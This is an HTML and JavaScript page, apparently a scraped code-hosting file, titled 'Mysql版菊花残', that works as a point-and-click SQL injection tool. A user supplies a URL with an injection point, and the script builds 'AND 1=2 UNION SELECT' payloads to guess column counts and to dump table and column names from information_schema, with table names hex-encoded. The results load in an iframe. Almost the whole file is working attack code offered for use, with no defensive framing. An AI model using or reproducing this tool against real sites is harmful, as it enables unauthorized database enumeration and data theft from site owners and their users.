代码拉取完成,页面将自动刷新
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Mysql版菊花残</title>
<link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.0/css/amazeui.min.css">
<script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
<script src="http://cdn.amazeui.org/amazeui/2.7.0/js/amazeui.js"></script>
<script>
$(function () {
var field = '';
var iterator = 1;
/**
* 字符串转化成十六进制编码
*/
var jsbin2hex = function bin2hex(s) {
// discuss at: http://locutus.io/php/bin2hex/
// original by: Kevin van Zonneveld (http://kvz.io)
// bugfixed by: Onno Marsman (https://twitter.com/onnomarsman)
// bugfixed by: Linuxworld
// improved by: ntoniazzi (http://locutus.io/php/bin2hex:361#comment_177616)
// example 1: bin2hex('Kev')
// returns 1: '4b6576'
// example 2: bin2hex(String.fromCharCode(0x00))
// returns 2: '00'
var i
var l
var o = ''
var n
s += ''
for (i = 0, l = s.length; i < l; i++) {
n = s.charCodeAt(i)
.toString(16)
o += n.length < 2 ? '0' + n : n
}
return o
};
var url = function () {
return $('#url').val()
};
var injectionUrl = function (url) {
$('#injection-url').html(url);
$('#injection-href').attr('href', url);
};
$('.field-test, .table-test, .table-field, .refresh').on('click', function () {
var str = url() + ' AND 1 =2 UNION SELECT ';
var export_filed = '';
var condition = '';
if ($(this).hasClass('field-test')) {//测试字段的,以数字形式递增测试。便于后面使用。
str += '1';
export_filed = iterator;
condition = "";
} else if ($(this).hasClass('table-test')) {//爆数据库所有表名称
str += export_filed = 'group_concat(a.table_name)';
var limit = $('#table-limit').val();
condition = ' FROM ( SELECT table_name FROM information_schema.tables LIMIT ' + limit + ', 100 ) AS a'
} else if ($(this).hasClass('table-field')) {//爆数据库表字段
str += export_filed = 'group_concat(a.column_name)';
var limit = $('#field-limit').val();
var table_name = jsbin2hex($('#table-name').val());
$('#demo-name').val(table_name);
condition = ' FROM (SELECT column_name FROM information_schema.columns WHERE table_name = 0x' + table_name + ' LIMIT ' + limit + ', 100 ) AS a ';
}
if (iterator > 1) {
if (!$(this).hasClass('refresh')) {
field += ',' + export_filed;
}
str += field;
}
str += condition;
$('#view').attr('src', str);
injectionUrl(str);
if (!$(this).hasClass('refresh')) {
var number = '';
for (i = 1; i <= iterator; i++) {
number += number == '' ? i : ',' + i;
}
$('#injection-num').html(number);
iterator++;
}
});
/**
* 重置数据
*/
$('.refield-test').on('click', function () {
field = '';
iterator = 1;
injectionUrl(url())
$('#injection-num').html('');
});
})
</script>
</head>
<body style="background: #f8f8f8;">
<form class="am-form">
<fieldset>
<legend>Mysql版菊花残 <span class="am-text-sm">——By luo</span></legend>
<div class="am-form-group">
<input type="text" id="url" placeholder="存在注入的网址">
<p class="am-text-middle">
</p>
</div>
<div class="am-form-group">
<a href="javascript:;" class="am-btn am-btn-success am-btn-xs refield-test">重置测试</a>
</div>
<div class="am-form-group">
<a href="javascript:;" class="am-btn am-btn-primary am-btn-xs field-test">字段测试</a>
<a href="javascript:;" class="am-btn am-btn-secondary am-btn-xs field-test refresh">更新数据</a>
</div>
<div class="am-form-group">
起止行:
<input type="text" class=" am-inline am-input-sm" id="table-limit" value="0" placeholder="爆表起止行" style="width: 50px;">
<a href="javascript:;" class="am-btn am-btn-danger am-btn-xs table-test">开始爆表</a>
<a href="javascript:;" class="am-btn am-btn-secondary am-btn-xs table-test refresh">更新数据</a>
</div>
<div class="am-form-group">
表名:
<input type="text" class=" am-inline am-input-sm" id="table-name" value="" placeholder="要爆破的表名称" style="width: 100px;">
<input type="text" class=" am-inline am-input-sm" id="demo-name" readonly value="" placeholder="字符串转16进制结果" style="width: 100px;">
字段起止行:
<input type="text" class=" am-inline am-input-sm" id="field-limit" value="0" placeholder="爆表起止行" style="width: 50px;">
<a href="javascript:;" class="am-btn am-btn-warning am-btn-xs table-field">开始爆表字段</a>
<a href="javascript:;" class="am-btn am-btn-secondary am-btn-xs table-field refresh">更新数据</a>
</div>
<div class="am-form-group">
<p>对应字段数字猜想:<span id="injection-num"></span></p>
<p><a id="injection-href" href="" target="_blank">当前注入URL</a> :<span id="injection-url"></span></p>
</div>
</fieldset>
</form>
<hr data-am-widget="divider" style="" class="am-divider am-divider-dotted am-margin-bottom-0 "/>
<iframe id="view" src="about:blank" width="100%" height="500"></iframe>
</body>
</html>
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。